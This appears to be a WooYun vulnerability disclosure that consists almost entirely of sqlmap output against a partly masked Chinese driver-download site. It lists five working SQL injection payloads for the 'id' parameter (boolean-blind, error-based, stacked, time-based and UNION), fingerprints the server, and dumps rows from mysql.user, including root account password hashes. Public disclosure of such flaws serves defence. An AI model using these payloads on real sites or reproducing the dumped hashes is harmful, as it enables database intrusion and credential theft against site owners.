WooYun.org

http://**.**.**.**/Chinese/drivers/drivers/index.php/Download/Index/model.html?id=107'

[12:13:08] [INFO] resuming back-end DBMS 'mysql'
[12:13:08] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=107) AND 7758=7758 AND (2121=2121
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=107) AND (SELECT 6395 FROM(SELECT COUNT(*),CONCAT(0x7178706b71,(SELECT (ELT(6395=6395,1))),0x717a706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3207=3207
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: id=107);(SELECT * FROM (SELECT(SLEEP(5)))LsoB)#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=107) AND (SELECT * FROM (SELECT(SLEEP(5)))bBHn) AND (8469=8469
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-3340) UNION ALL SELECT CONCAT(0x7178706b71,0x71484b7867577074504b,0x717a706271),NULL,NULL--
---
[12:13:11] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0
[12:13:11] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\**.**.**.**'
[*] shutting down at 12:13:11

select user,password,host from mysql.user [4]:
[*] driver, *526ABB24F5210EA487ADB579B111CD834BA036C6, %
[*] root, *526ABB24F5210EA487ADB579B111CD834BA036C6, **.**.**.**
[*] root, *526ABB24F5210EA487ADB579B111CD834BA036C6, ::1
[*] root, *B751D70DD9EF3282D07FAB1179B17D159622478C, localhost